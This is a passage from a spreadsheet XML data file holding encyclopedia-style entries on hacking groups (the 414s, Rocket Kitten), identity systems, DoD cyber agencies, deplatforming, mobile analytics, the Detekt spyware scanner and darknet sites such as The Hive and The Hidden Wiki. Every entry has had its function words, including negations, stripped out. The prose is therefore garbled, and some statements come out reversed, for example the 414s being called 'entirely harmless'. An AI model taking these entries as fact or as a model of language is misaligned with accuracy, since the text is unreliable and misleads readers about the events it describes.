inequalities cultural diversity. case jamaica dominican republic, digital national systems particularly illustrious pressing issues reinforcement discriminatory biases severe limitations right privacy. regardless claims issues civil society organisations social movements, policies progressed countries. united states although ubiquitous digital identity service exists, u.s. social security numbers national identity number validated authorized private institutions using american government's social security number validation service. also digital footprint digital rhetoric e-authentication federated identity informational self-determination privacy design death internet references</t>
  </si>
  <si>
    <t>The 414s</t>
  </si>
  <si>
    <t>414s group computer hackers milwaukee broke dozens high-profile computer systems, including ones alamos national laboratory, sloan-kettering cancer center, security pacific national bank, 1982 1983. history they eventually identified teenagers, taking name ibm-sponsored explorer post hometown milwaukee, wisconsin, used telephone area code 414. they ranged many explorer scout program sponsored ibm.the 414s described meeting profile computer hackers time: "young, male, intelligent, highly motivated energetic". neal patrick claimed motivation challenge getting places supposed remaining undetected. another member, winslow, began learning computers teletype math teacher brought school.many harmless pranksters, sort real life wargames—a film released earlier year. 414s entirely harmless, $1,500 worth damage sloan-kettering june 1983 break-in accidentally deleting billing records. patrick 414s cause real concern, experts realized others could duplicate techniques real damage.the systems broke exclusively running digital equipment corporation's (dec's) rsts/e operating systems. they used inexpensive personal computers, analog modems, simple hacking techniques, using common default passwords published dec's manufacturer guides various timeshare systems. 414s exploited lack administrative oversight password care systems. among reporting unusual hacking activities chen chui, administrator discovered electronic break-in, left message intruders, contacted fbi, placed wiretaps eventually traced calls back milwaukee. gerald wondra, time, first visited fbi. wondra lived mother west allis, milwaukee suburb. wondra said "curious, fun". investigation 414s investigated identified 1983 included installing data-capture equipment phone lines. winslow (20), wondra (21), patrick (17) visited agents. most members 414s prosecuted, various agreements stop activities restitutions. winslow, wondra, another defendant charged pleaded guilty counts "making harassing telephone calls". patrick, minor, risk prosecution used public attention appear various television shows. freedom information request made november 2020 returned responsive documents". media there widespread media coverage time, 17-year-old neal patrick, student rufus king high school, emerged spokesman "instant celebrity" brief frenzy interest, included patrick appearing morning news, phil donahue show august 1983, appeared september 1983 cover newsweek. during appearance nbc's today show asked regrets, replied hindsight, really wish accessing systems wasn’t easy.”as result news coverage, congressman glickman called investigation laws computer hacking. neal patrick testified u.s. house representatives september 1983 dangers computer hacking, bills concerning computer crime introduced house year. documentary documentary called 414s: original teenage hackers premiered competition 2015 sundance film festival picked distribution cnn. film features present-day interviews original 414s reflect early days hacking media attention followed. popular culture television show halt catch fire features newsweek cover story incident, correctly displays "414 hacker neal patrick" subsequent episode called "the 214s" dallas area code, show set), plot point includes character attempting recreate break-in. references external links 414s imdb</t>
  </si>
  <si>
    <t>Digital Trust Center</t>
  </si>
  <si>
    <t>digital trust center dutch organisation, main goal help entrepreneurs safe digital entrepreneurship. organisation initiative ministry economic affairs climate policy (dutch: ministerie economische zaken klimaat) supported confederation netherlands industry employers (vno-ncw), royal association mkb-nederland), national coordinator security counterterrorism, national cyber security centre platform information society, platform netherlands, nldigital, dutch chamber commerce. target group digital trust center's target group consists million companies: freelancers large companies. these companies netherlands belong so-called vital sectors, banks, telecom, energy water companies. companies vital sectors national cyber security centre partner within central government. mission dutch trust centers mission increase resilience businesses cyber threats focus tasks. first task provide businesses reliable independent information digital vulnerabilities concrete advice action take, means digital platform facilities. second task foster cyber security alliances businesses. both tasks help businesses improve cyber security arrangements increase resilience cyber threats. external links dutch) digital trust center</t>
  </si>
  <si>
    <t>Rocket Kitten</t>
  </si>
  <si>
    <t>rocket kitten rocket kitten group hacker group thought linked iranian government. threat actor group targeted organizations individuals middle east, particularly israel, saudi arabia, iran well united states europe. origins cybersecurity firm fireeye first identified group ajax security team, writing group appears formed 2010 hacker personas "cair3x" "hurr!c4ne!". 2012, threat actor group turned focus iran's political opponents. their targeted attack campaigns, dubbed "rocket kitten", known since mid-2014. 2013 2014, rocket kitten shifted focus malware-based cyberespionage.security firm check point describes rocket kitten "attacker group iranian origin."rocket kitten's code uses persian language references. group's targets involved defense, diplomacy, international affairs, security, policy research, human rights, journalism. according check point, group targeted iranian dissidents, saudi royal family, israeli nuclear scientists nato officials. security researchers found carried "common pattern spearphishing campaigns reflecting interests activities iranian security apparatus." other researchers determined rocket kitten's attacks bore similarity attributed iran's revolutionary guards. intelligence officials middle east europe linked rocket kitten iranian military establishment. rocket kitten favours remote access trojan, 2015, researchers found using customised malware. history operation saffron rose cybersecurity firm fireeye released report 2013 finding rocket kitten conducted several cyberespionage operations united states defense industrial base companies. report also detailed targeting iranian citizens anti-censorship tools bypass iran's internet filters. operation woolen-goldfish trend micro identified operation woolen-goldfish campaign march 2015 paper. campaign included improved spearphishing content. oyun november 2015, security errors rocket kitten allowed firm check point gain password-less root access "oyun", hackers' back-end database. they discovered application able generate personalized phishing pages contained list 1,842 individual targets. among rocket kitten's spearphishing targets june 2014 june 2015, saudi arabia, united states, iran, netherlands, israel. analysts used credentials access logs group's victims found rocket kitten apparently tested malware workstations failed erase logs data files. check point identified individual named yaser balaghi, going wool3n.h4t, ringleader operation. telegram hack august 2016, researchers identified rocket kitten behind hack telegram, cloud-based instant messaging service. hackers exploited telegram's reliance verification, comprising dozen accounts stealing user telephone numbers million iranians software. opposition organizations reformist political activists among victims. references external links kittens back: rocket kitten trend micro.</t>
  </si>
  <si>
    <t>Differentiated security</t>
  </si>
  <si>
    <t>differentiated security form computer security deploys range different security policies mechanisms according identity context user transaction. this makes much difficult scale replicate attacks, since cluster/individual different security profile common weaknesses. achieving subdividing population small differentiated clusters. extreme, individual belongs different class. also differentiated service (design pattern) separation protection security external links differentiated security wireless networks andreas johnsson, 2002.</t>
  </si>
  <si>
    <t>Mobile driver's license</t>
  </si>
  <si>
    <t>mobile driving licence (also mobile driver's license mdl) mobile replaces physical driver's license. international organization standardization (iso) standard mobile driving licence (iso 18013-5) approved august 2021 published september 2021. history first instance electronic driver's license deployed mexico early 2007, using gemalto smart-card platform. 2016, u.s. national institute standards technology (nist) partnered gemalto pilot "digital driver's license" washington d.c., idaho, colorado, maryland wyoming.colorado first state deploy production version digital license, primarily based codes stored digital wallet, claims accepted police officers throughout state. after going standard process state department motor vehicles, volunteers installed "digidl" phones downloaded license. volunteers tested digital driver's license stores, colorado lottery claim center, fair.the first claims compliance 18013-5 louisiana's, developed part envoc, software firm baton rouge, whose president claimed drivers back home forget physical laminated license, "but forget phone, always turn around." ontario 2020, response covid-19 pandemic, announced "digital identity program," including mobile driver's license. denmark 2020 introduced mobile driver's license uses code. according standard, holder's privacy protected since need hand phone provide proof identity. operating system support smartphone operating systems adapting standard. example, android's jetpack suite comes specific support 18013–5 version september 2021, apple provided details implementation standard arizona georgia became first states announce supported. march 2022, arizona officially launched program includes first checkpoint support apple’s mobile driver’s license, phoenix harbor international airport. conformance testing safety organization product help test app's conformance 18013-5 standard. kantara initiative created "privacy identity protection mobile driving license ecosystems discussion group" issue report need conformance specifications around identity privacy. references external links status page thales. frequently updated kantara/idesg wiki collection privacy notice issues</t>
  </si>
  <si>
    <t>Department of Defense Cyber Crime Center</t>
  </si>
  <si>
    <t>department defense cyber crime center (dc3) designated federal cyber center national security presidential directive 54/homeland security presidential directive department defense (dod) center excellence digital multimedia (d/mm) forensics directive 5505.13e, serves operational focal point defense industrial base (dib) cybersecurity program. operates field operating agency (foa) inspector general department force. mission deliver superior d/mm forensic services, cyber technical training, vulnerability sharing, technical solutions development, cyber analysis following mission areas: cybersecurity (cs) critical infrastructure protection (cip), enforcement counterintelligence (le/ci), document media exploitation (domex), counterterrorism (ct). digital multimedia forensics cyber forensics laboratory (dc3/cfl) performs d/mm forensic examinations, device repair, data extraction, expert testimony dod. lab's robust intrusion malware analysis capability supports lines business activities. operations accredited 17025 american society crime laboratory directors/laboratory accreditation board (ascld/lab) guides reliable, repeatable, valid exam results, subjected quality control peer review. cyber training cyber training academy, formerly dcita (the defense cyber investigations training academy), provides in-residence online training elements protect information systems unauthorized use, criminal, fraudulent, foreign intelligence activities. academy's curriculum offers courses organized specialty areas. since founding 1998, academy recorded 35,000 student enrollments courses. technical solutions technical solutions development (dc3/tsd) directorate tailors software system solutions engineered specific requirements digital forensic examiners cyber intrusion analysts. validates commercial off-the-shelf (cots), government off-the-shelf (gots), in-house developed software/hardware used forensic process. addition, functions repository cyber counterintelligence (ci) tools. cybersecurity operational cs/ia program, collaborative information sharing environment (dc3/dcise) assists companies safeguard content intellectual property residing transiting unclassified networks. dcise develops shares actionable threat products, performs cyber analysis, diagnostics, remediation consults partners. analytical group analytical group (dc3/ag) supports le/ci agencies, including force office special investigations (afosi), naval criminal investigative services (ncis), mission partners federal bureau investigation (fbi). member agency national cyber investigative joint task force (ncijtf), leads collaborative analytical technical exchange subject matter experts le/ci, computer network defense (cnd), intelligence community (ic), information assurance (ia) agencies build threat picture enabling proactive le/ci cyber operations focuses nation-state threat actors. vulnerability disclosure vulnerability disclosure program (vdp) leverages experience knowledge ethical hackers around world improve network defenses enhance mission assurance. assigned secretary defense focal point receiving vulnerability reports interacting researchers consistent dc3's existing information sharing responsibilities federal cybersecurity center. also department force inspector general department force list united states force field operating agenciesmilitary criminal investigative organizations force office special investigations (afosi) united states army criminal investigation command (usacidc cid) united states army counterintelligence (usai naval criminal investigative service (ncis) defense criminal investigative service (dcis) coast guard investigative service (cgis)federal enforcement federal enforcement training centers criminal investigation task force (citf) internet crimes against children (icac) task force references "cybersecurity policy" (pdf). federation american scientists (fas). national security presidential directive (nspd), homeland security presidential directive (hspd). 2008. nspd-54, hspd-23. external links official webpage usaf official webpage</t>
  </si>
  <si>
    <t>Department of Defense Information Assurance Certification and Accreditation Process</t>
  </si>
  <si>
    <t>information assurance certification accreditation process (diacap) deprecated united states department defense (dod) process meant ensure companies organizations applied risk management information systems (is). diacap defined dod-wide formal standard activities, general tasks management structure process certification accreditation (c&amp;a) maintained information assurance (ia) posture throughout system's life cycle. 2015, diacap replaced "risk management framework (rmf) information technology (it)". although re-accreditations diacap continued late 2016, systems started accreditation 2015 required transition processes. aligns national institute standards technology (nist) risk management framework (rmf). history diacap resulted directed shift underlying security approaches. interim version diacap signed july 2006, superseded interim ditscap guidance. final version called department defense instruction 8510.01, signed march 2014 (previous version november 2007). dodi 8500.01 cybersecurity http://www.dtic.mil/whs/directives/corres/pdf/850001_2014.pdf, dodi 8510.01 risk management framework (rmf) information technology (it) https://fas.org/irp/doddir/dod/i8510_01.pdf diacap differed ditscap several ways—in particular, embrace idea information assurance controls (defined dodd 8500.1 dodi 8500.2) primary security requirements automated information systems (aiss). applicable controls assigned based system's mission assurance category (mac) confidentiality level (cl). process system identification profile diacap implementation plan validation certification determination diacap scorecard poa&amp;m authorization operate decision residual risk acceptance references diacap guidance information assurance support environment diacap knowledge service (requires certificate) diacap control indexer full list diacap phases instructions govitwiki. dpt. defense instruction 8510.01: information assurance certification accreditation process department defense directive 8500.1: information assurance (ia) department defense instruction 8500.2: information assurance (ia) implementation external links approved 8570 baseline certifications</t>
  </si>
  <si>
    <t>Deplatforming</t>
  </si>
  <si>
    <t>deplatforming, also known no-platforming, defined "attempt boycott group individual removing platforms (such speaking venues websites) used share information ideas," "the action practice preventing someone holding views regarded unacceptable offensive contributing forum debate, especially blocking particular website." history deplatforming invited speakers united states, banning speakers university campuses dates back 1940s. this carried policies universities themselves. university california policy known speaker ban, codified university regulations president robert gordon sproul mostly, exclusively, targeted communists. rule stated "the university assumed right prevent exploitation prestige unqualified persons would platform propaganda." this rule used 1951 block shachtman, socialist, speaking university california berkeley. 1947, former u.s. vice president henry wallace banned speaking ucla views u.s. cold policy, 1961, malcolm prohibited speaking berkeley religious leader. controversial speakers invited appear college campuses faced deplatforming attempts disinvite otherwise prevent speaking. british national union students established platform policy early 1973. mid-1980s, visits south african ambassador glenn babb canadian college campuses faced opposition students opposed apartheid.in united states, recent examples include march 2017 disruption protestors public speech middlebury college political scientist charles murray. february 2018, students university central oklahoma rescinded speaking invitation creationist ham, pressure lgbt student group. march 2018, "small group protesters" lewis clark school attempted stop speech visiting lecturer christina hoff sommers. 2019 film safe spaces, adam carolla dennis prager documented disinvitation along others.as february 2020, foundation individual rights education, speech advocacy group, documented disinvitation disruption attempts american campuses since 2000, including "unsuccessful disinvitation attempts" "successful disinvitations"; group defines latter category including three subcategories: formal disinvitation sponsor speaking engagement; speaker's withdrawal face disinvitation demands"; "heckler's vetoes" (situations "students faculty persistently disrupt entirely prevent speakers' ability speak"). deplatforming social media beginning 2015, reddit banned several communities site ("subreddits") violating site's anti-harassment policy. 2017 study published journal proceedings human-computer interaction, examining "the causal effects participating users affected communities," found "the served number useful purposes reddit" "users participating banned subreddits either left site (for remained) dramatically reduced hate speech usage. communities inherited displaced activity users suffer increase hate speech." june 2020 january 2021, reddit also issued bans prominent online pro-trump communities violations website's content harassments policies. 2019, facebook facebook-owned platform instagram announced "dangerous individuals organizations" including nation islam leader louis farrakhan, milo yiannopoulos, alex jones organization infowars, paul joseph watson, laura loomer, paul nehlen. wake 2021 storming capitol, twitter banned then-president donald trump, well 70,000 accounts linked event far-right movement qanon. donald trump january 2021, joint session united states congress, counting votes electoral college interrupted breach united states capitol chambers. rioters supporters president donald trump hoped delay overturn president's loss 2020 election. event resulted five deaths least people charged crimes. certification electoral votes completed early morning hours january 2021. wake several tweets president trump january 2021 facebook, instagram, youtube, reddit, twitter deplatformed trump extent. twitter deactivated personal account, company said could possibly used promote violence. trump subsequently tweeted similar messages president's official government account @potus, resulted permanently banned january twitter announced trump's platform permanent. trump planned re-join social media platform june 2021, according jason miller news broadcast. other examples harassment threats employment deplatforming tactics also included attempts silence controversial speakers various forms personal harassment, doxing, making false emergency reports purposes swatting, complaints petitions third parties. cases, protesters attempted speakers blacklisted projects fired jobs.in 2019, example, students university arts philadelphia circulated online petition demanding camille paglia "should removed uarts faculty replaced queer person color." according atlantic's conor friedersdorf, rare student activists argue tenured faculty member institution denied platform." paglia, tenured professor years identifies transgender, long unapologetically outspoken controversial "matters sex, gender identity, sexual assault". print media december 2017, learning french artist previously reviewed neo-nazi, francisco punk magazine maximum rocknroll apologized announced strict no-platform policy towards bands artists nazi ideology". legislative responses united kingdom 2021, government boris johnson announced higher education (freedom speech) bill would allow speakers universities seek compensation no-platforming, impose fines universities student unions promote practice, establish ombudsman charged monitoring cases no-platforming academic dismissals. addition, government published online safety bill would prohibit social media networks discriminating particular political views removing "democratically important" content, comments opposing supporting political parties policies. united states some critics deplatforming proposed governments treat social media public utility ensure constitutional rights users protected, citing belief internet presence using social media websites imperative order adequately take part 21st century individual. reactions justifications according defenders, deplatforming used tactic prevent spread hate speech disinformation. social media evolved significant source news reporting users, support content moderation banning inflammatory posters defended editorial responsibility required news outlets.supporters deplatforming justified action grounds produces desired effect reducing characterize "hate speech". angelo carusone, president progressive organization media matters america deplatforming campaigns conservative talk hosts rush limbaugh 2012 glenn beck 2010, pointed twitter's 2016 milo yiannopoulos, stating "the result lost lot.... lost ability influential least project veneer influence."in united states, deprivation rights first amendment sometimes cited criticism deplatforming, according audie cornish, host show consider this, modern deplatforming government issue. states "the government can't silence ability almost anything want public street corner. private company silence ability whatever want platform created." because this, proponents say, deplatforming legal dealing controversial users online digital spaces, long government involved causing deplatforming. critical responses according technology journalist declan mccullagh, "silicon valley's efforts pull plug dissenting opinions" began around 2018 twitter, facebook, youtube denying service selected users platforms, "devising excuses suspend ideologically disfavored accounts." 2019, mccullagh predicted paying customers would become targets deplatforming well, citing protests open letters employees amazon, microsoft, salesforce, google opposed policies u.s. immigration customs enforcement (ice), reportedly sought influence employers deplatform agency contractors.law professor glenn reynolds dubbed 2018 "year deplatforming" august 2018 article wall street journal. reynolds criticized decision "internet giants" "slam gates number people ideas like", naming alex jones gavin mcinnes. reynolds cited restrictions "even mainstream conservative figures" dennis prager, well facebook's blocking campaign advertisement republican candidate "ostensibly video mentioned cambodian genocide, family survived."in 2019 article, conor friedersdorf described called "standard practice" among student activists: "activists begin social-media callouts; urge authority figures impose outcomes favor, without regard overall student opinion; marshal antidiscrimination limit freedom expression." friedersdorf pointed evidence chilling effect free speech academic freedom. faculty members contacted interviews, large majority sides controversy insisted comments kept record anonymous. they feared openly participating debate major event institution—even university president uncompromising statement support free speech". also boycott platform freedom speech censorship online shaming social media public utility references further reading rogers, richard (may 2020). "deplatforming: following extreme internet celebrities telegram alternative social media". european journal communication. (3): 213–229. doi:10.1177/0267323120922066. external links dictionary definition deplatform wiktionary</t>
  </si>
  <si>
    <t>Mobile web analytics</t>
  </si>
  <si>
    <t>mobile analytics studies behaviour mobile website users similar traditional analytics. commercial context, mobile analytics refers data collected users access website mobile phone. helps determine aspects website work best mobile traffic mobile marketing campaigns work best business, including mobile advertising, mobile search marketing, text campaigns, desktop promotion mobile sites services. data collected part mobile analytics typically includes page views, visits, users, countries, well information specific mobile devices, device model, manufacturer, screen resolution, device capabilities, service provider, preferred user language. this data typically compared performance indicators performance return investment, used improve website mobile marketing campaign's audience response. majority modern smartphones able browse websites, browsing experiences similar desktop computers. mobile initiative identifies best practices help websites support mobile phone browsing. many companies guidelines mobile-specific code like wireless markup language html5 optimize websites viewing mobile devices. background collecting mobile analytics data proven less straightforward traditional analytics factors. traditional analytics software mobile website provides data http requests coming advanced mobile browsers; found iphone smart phones pdas, data mobile devices browsing site. additionally, common analytics software server parsing associate different addresses "unique visits" fail actually identify unique visitors. this addresses mobile device originating gateway address network access provider. several dynamic server-side platforms used develop mobile sites. server-side tracking code recommended accurate analytics reporting. platforms html/javascript wordpress mobile pack .net java python coldfusion ruby rails node.js/connect typepad prodifferent tracking processes mechanisms available platforms. unsupported/html sites, javascript pixel tracking mechanism commonly used. because mobile websites typically open access kind network fixed, wi-fi, cellular wireless, satellite wireless, etc. traditional analytics solution could range fairly accurate mostly inaccurate, depending http requests coming from. addition, mobile analytics involve metrics kpis associated mobile device information, model, manufacturer, screen resolution. these data usually assembled combining device identification information taken special http headers, user-agents, device capabilities stored device information registry, wurfl. this method provided traditional analytics solutions mobile web-specific. problems tracking visitor identification visitor identification important aspect usable mobile analytics hardest technical aspects accomplish, primarily javascript http cookies unreliable mobile browsers. result, mobile analytics solutions detect count user visits day. best solutions provide reliable, persistent, unique user identities, allowing accurate measurement repeat visits long-term customer loyalty. javascript page tagging javascript-based page tagging notifies third-party server page rendered browser. this method assumes user browser javascript capabilities javascript enabled, though possible neither true. time, mobile browsers support javascript sufficiently work. http cookies http cookies commonly used mark identify visitors. cookies standard capability desktop browsers. with prevalence iphones androids, http cookies supported smartphones, default, iphones android phones accept browser cookies sites. desktop browsers, mobile device user choose disable cookies. http referrer http referrer information showing visitor navigated generally provided mobile browsing. this either device manufacturer disabled sending information http request save bandwidth network usage, mobile network operator's internet gateway removes alters original http header gateway software mobile transcoding software. image tags handset caching mechanisms impact images page tagging. cases, image caching handsets performed regardless anti-caching headers output remote server. address desktop browsing, network address client machine usually gives form user identification location. mobile browsing, client address refers internet gateway machine owned network operator. devices blackberry phones using opera mini browser software, address refers operator-owned internet gateway machine canada norway. collecting mobile analytics data collection mobile analytics data requires different approach collecting traditional analytics data. number solutions available best results obtained technology. packet sniffing also known tagless data capture passive network capture, technique uses mobile users server capture full content client-server exchange. tagless data capture techniques increasing popularity mobile analytics capture users, work devices require javascript, cookies, server logs, plugins. image tags beacons images forced work mobile analytics, provided transmitted image always unique. level information recorded transmissions depends architecture provided supplier, image beacon solutions same. link redirection link redirection important method tracking mobile visitor activities. reliable record clicks advertising, search, marketing activities. also records visitors clicking links leave site. this method helps address lack http referrer information mobile. http header analysis this tells number basic facts mobile phone browser. used conjunction device database wurfl. address analysis operator database used identify operators countries based addresses internet gateway devices. addresses alone identify operators countries, operators share mobile networks virtual network operators (mvno). boost wireless, example, uses sprint network. because operators different customer demographics, clear differentiation operators critical good mobile marketing campaigns. carriers also share mobile internet gateways, sometimes across multiple countries, many change gateways regular basis. gateway traffic logs gateway logs mine information analysed relevant information mobile traffic goes servers. there companies like openwave tools analyse logs provide information required. references</t>
  </si>
  <si>
    <t>Detekt</t>
  </si>
  <si>
    <t>detekt discontinued free tool amnesty international, digitale gesellschaft, eff, privacy international scan surveillance software microsoft windows.it intended activists journalists scan known spyware. tool detekt available free download.the tool guarantee detection spyware, meant give false sense security, meant used methods combat malware spyware.in 2014, coalition against unlawful surveillance exports estimated global trade surveillance technologies worth billion annually.detekt available amharic, arabic, english, german, italian, spanish. technical tool required installation, designed scan surveillance software windows pcs, windows 8.1.the tool scanned current surveillance software, scanning, would display summary indicating spyware found not. would generate file containing details. tool guarantee absolute protection surveillance software, scanned known spyware time release), could modified circumvent detection, software would become available. therefore, clean bill health necessarily mean free surveillance software. website instructed user disconnect internet connection, close applications, running, turn connection back spyware found. detekt released gplv3 free license.detekt developed claudio guarnieri help bill marczak, morgan marquis-boire, galperin, tanya o'carroll, andre meister, jillian york, michael ligh, endalkachew chala. provided patterns following malware: darkcomet rat, xtremerat, blackshades rat, njrat, finfisher finspy, hackingteam rcs, shadowtech rat, gh0st rat. also computer network surveillance computer surveillance workplace internet censorship internet privacy freedom information (anonymity network) 2013 mass surveillance disclosures references external links official website</t>
  </si>
  <si>
    <t>Mobile virtual private network</t>
  </si>
  <si>
    <t>mobile virtual private network (mobile mvpn) capable persisting sessions across changes physical connectivity, point network attachment, address. "mobile" name refers fact change points network attachment, necessarily mvpn client mobile phone running wireless network.mobile vpns used environments workers need keep application sessions open times, throughout working day, connect various wireless networks, encounter gaps coverage, suspend-and-resume devices preserve battery life. conventional cannot survive events network tunnel disrupted, causing applications disconnect, time out, fail, even computing device crash. mobile vpns commonly used public safety, home care, hospital settings, field service management, utilities industries. increasingly, adopted mobile professionals white-collar workers. comparison types maintains authenticated, encrypted tunnel securely passing data traffic public networks (typically, internet.) other types ipsec vpns, useful point-to-point connections network endpoints known remain fixed; vpns, provide access browser commonly used remote workers.makers mobile vpns draw distinction remote access mobile environments. remote-access user typically establishes connection fixed endpoint, launches applications connect corporate resources needed, logs off. mobile environment, endpoint changes constantly (for instance, users roam different cellular networks wi-fi access points). mobile maintains virtual connection application times endpoint changes, handling necessary network logins manner transparent user. functions following functions common mobile vpns. management some mobile vpns offer additional "mobile-aware" management security functions, giving information technology departments visibility control devices corporate premises connect networks outside it's direct control. industries applications mobile vpns found uses variety industries, give mobile workers access software applications. telecommunications telecommunication, mobile solution provides data user mobility ensures secure network access predictable performance. data user mobility defined uninterrupted connectivity ability stay connected communicate possibly remote data network changing network access medium points attachment.in 2001, huawei launched product named "mvpn". case "mvpn" different meaning later industry sources would term. huawei product focused delivering seamless corporate phone system users whether desktop phones mobile devices. although page longer available, company advertised mvpn following advantages standard phone system: direct connectivity corporate network becomes part mobile operator's network direct connection private numbering plan communication tailored company organization corporate business group offices employees part common group, includes mobile desk phones short dialing short number access employee, meter mobile desk phone smart divert easy divert within company group groups subgroups several sub-groups could defined within group different changing well separate numbering plan calls control certain destinations could allowed barred mobile desk phones. vendors bittium columbitech connectify ericsson neoaccel netmotion wireless radio software smith micro software tmharay references external links consortium introduction ipsec vpns mobile phones" ramon arja, msdn magazine, september 2009 different networks their funcationality search mobile computing: mobile "face-off: mobile better choice vpn" johnaton, network world november 2006)</t>
  </si>
  <si>
    <t>Mobile signature roaming</t>
  </si>
  <si>
    <t>mobile telecommunications technology, concept mobile signature roaming means access point (ap) able mobile signature end-user, even end-user contracted commercial relationship mssp. otherwise, would build commercial terms many mssps possible, might cost burden. this means mobile signature transaction issued application provider able reach appropriate mssp, transparent mobile signature roaming requires commercial agreements entities facilitate respect, assume various entities (including mssps) join order define common commercial terms rules corresponding mobile signature roaming service. this concept mobile signature roaming service. entities involved acquiring entity (ae): entity performing role entry points mesh, handles commercial agreements aps. entry point mesh instance mssp, aggregator application providers context particular communities interests (e.g. payment associations, banks, mnos etc.). that's reason define abstract role. acquiring entity implements service interface specified [8]; home mssp (hmssp): mssp able deal current end-user current transaction; routing entity (re): entity facilitates communication home mssp; attribute provider: role described liberty alliance [3]. several mesh members undertake role store relevant attributes order facilitate discovery home mssp mesh members; identity issuer: entity able make link mobile signature user's identity. within system, typically certificate authority (ca) and/or registration authority (ra); verifying entity (ve): entity verify mobile signature. mssp verifying entity well; acquiring mssp (amssp): mssp acting entry point mesh. imagine commercial model mobile signature roaming service mesh mssps fully partially connected others. first mobile signature roaming transactions april 2005 "finnet teliasonera finland performed successful roaming" february 2007 "world's first international mobile signature roaming etsi-mss valimo (finland) (norway)" references</t>
  </si>
  <si>
    <t>Robert Willis (hacker)</t>
  </si>
  <si>
    <t>robert willis, also known rej_ex, american hacker comic book writer. willis known work sakura samurai white-hat hacking group, contributions wiley tribe hackers book series. 2015, helped build platform strategy news syndication would ultimately used promote candidacy donald trump hillary clinton; pieces would reach million people week prior 2016 election. early life willis born stamford, connecticut raised mother family, immigrated united states italy.willis became interested computers young age, began working online hacker groups. later identified movies hackers matrix contributors interest hacking. career hacking willis worked offensive security teaming military, later receiving texas medal merit cybersecurity work. also employed time threatcare, cyberattack simulation company. 2020, willis managing member 1337, inc., defensive cybersecurity company based austin, texas. also member sakura samurai hacking group. through work sakura samurai, willis involved discovering security issues affecting indian governmental groups, fermilab particle physics laboratory, ford, john deere.willis featured wiley publications tribe hackers: cybersecurity advice best hackers world, tribe hackers team: tribal knowledge best offensive cybersecurity, tribe hackers blue team: tribal knowledge best defensive cybersecurity. hacker october 2021, willis revealed technica profile "hacker previously anonymous individual described theresa payton 2020 book, manipulated: inside cyberwar hijack elections distort truth. comic books willis’s first comic series called paraneon, included three titles: hive network, neon skyline, portals. books originally launched kickstarter, eventually raising 300% original funding goal. 2021, willis obtained trademark gold comics. political activism willis said identifies socially liberal fiscally conservative. bibliography wiley publishing tribe hackers: cybersecurity advice best hackers world (contributing writer, august 2019) tribe hackers team: tribal knowledge best offensive cybersecurity (contributing writer, august 2019) tribe hackers blue team: tribal knowledge best defensive cybersecurity (contributing writer, september 2020) corporate cybersecurity: identifying risks bounty program (forward, december 2021) afterlife comics neon skyline (writer, letterer, artist, march 2021) hive network (writer, colorist, letterer, artist, march 2021) portals (writer, march 2021) initiating ...paraneon (writer, colorist, letterer, april 2021) references external links official website</t>
  </si>
  <si>
    <t>The Hub (forum)</t>
  </si>
  <si>
    <t>discussion forum hidden services dark focused darknet market reviews, cryptocurrency security. second popularity reddit's /r/darknetmarkets, site launched january 2014 secure, verifiable discreetly moderated alternative. vendors must verified prior getting vendor status forum. hosted fernando caudevilla, 'doctorx' adviser site's drug users answered thousand questions forums original silk road silk road site ongoing harm reduction drug awareness program. references external links official site: thehub7xbw4dc5r2.onion (accessing link help)</t>
  </si>
  <si>
    <t>The Hive (website)</t>
  </si>
  <si>
    <t>hive website served information-sharing forum individuals groups interested practical synthesis, chemistry, biology, politics, legal aspects mind body-altering drugs. participants ranged pure theorists self-declared organized crime chemists (claimed retired excellent connections) well forensic chemists, (much like quarries) used hive keep abreast developments clandestine chemistry. peak, hive thousands participants world. history although operation since 1997, hive gained broader awareness 2001 dateline special files aired. this investigation production mdma featured hive founder, operated pseudonym 'strike' (hobart huson). strike founder site designer hive well author several popular books (total synthesis sources) instructing readers synthesize variety amphetamines- specifically mdma-, obtain equipment chemicals, avoid prosecution. remained anonymous dateline's investigation interviews revealed hobart huson (owner strike-recommended laboratory supplier "science alliance") behind strike. program showed huson/strike office/chemical warehouse, complete stuffed sitting computer. program huson's arrest imprisonment, also spurred site's growth. person username 'rhodium' small group dedicated individuals actually hive sister site rhodium.ws sites' lifespans. while hive public forum asking questions exchanging information, rhodium.ws hosted collection drug synthesis information condensed organized form, much derived messages posted hive. also large collection articles academic journals, plus considerable general-purpose information practical chemistry. rhodium's site also taken offline shortly hive. most archive hosted erowid. scattered across 1.73 gigabytes files part rhodium's archive.the hive closed 2004 hosting issues. 2015 site made accessible complete archive erowid, forum pages however broken late 2016. hive successor, "thevespiary", hosts multitude drug-related articles, synthesis guides, drug-related news well pharmaceutical information. also dark-net market erowid references external links hive archive, official complete forum archive erowid hive, background hive erowid, archive rhodium content thevespiary, successor hive.</t>
  </si>
  <si>
    <t>The Hidden Wiki</t>
  </si>
  <si>
    <t>hidden wiki dark mediawiki wiki operating hidden services could anonymously edited registering site. main page served directory links .onion sites. history first hidden wiki operated .onion pseudo top-level domain accessed using gateway. main page provided community-maintained link directory hidden services, including links claiming offer money laundering, contract killing, cyber-attacks hire, contraband chemicals, bomb making. rest wiki essentially uncensored well also offered links sites hosting child pornography abuse images.the earliest mention hidden wiki 2007 located 6sxoyfb3h2nvok2d.onion.a well known iteration hidden wiki founded time october 2011, coming prominence associations illegal content.at point prior august 2013, site hosted freedom hosting.in march 2014 site kpvz7ki2v5agwt35.onion domain hacked redirected doxbin. following event, content began mirrored locations. during operation onymous november 2014, bulgarian hosting compromised, site served message enforcement. successors there several .onion websites hosting successors based mirrors hidden wiki; such, longer single official hidden wiki. many hosted accessibility reasons, frequent downtime instability main wiki, others launched order filter links child pornography. also references external links guide hidden services elements network wikibooks</t>
  </si>
  <si>
    <t>Dialer</t>
  </si>
  <si>
    <t>dialer (american english) dialler (british english) electronic device connected telephone line monitor dialed numbers alter seamlessly provide services otherwise require lengthy national international access codes dialed. dialer automatically inserts modifies numbers depending time day, country area code dialed, allowing user subscribe service providers offer best rates. example, dialer could programmed service provider international calls another cellular calls. this process known prefix insertion least cost routing. line powered dialer need external power instead takes power needs telephone line. another type dialer computer program creates connection internet another computer network analog telephone integrated services digital network (isdn). many operating systems already contain program connections point-to-point protocol (ppp), wvdial. many internet service providers offer installation simplify process setting proper internet connection. they either create entry os's dialer install separate dialer software does). recent years, term "dialer" often refers specifically dialers connect without user's full knowledge cost, creator dialer intending commit fraud. dialing modes call centers several dialing modes depending call placed. 'manual dialing' refers calls placed manually agent. there different dialing modes depending software dialers selects contacts going called starts making calls. automated dialers sold noble systems, avaya, ricochet360 (formerly known speed contact), convoso (formerly safesoft solutions) place calls using *preview*, 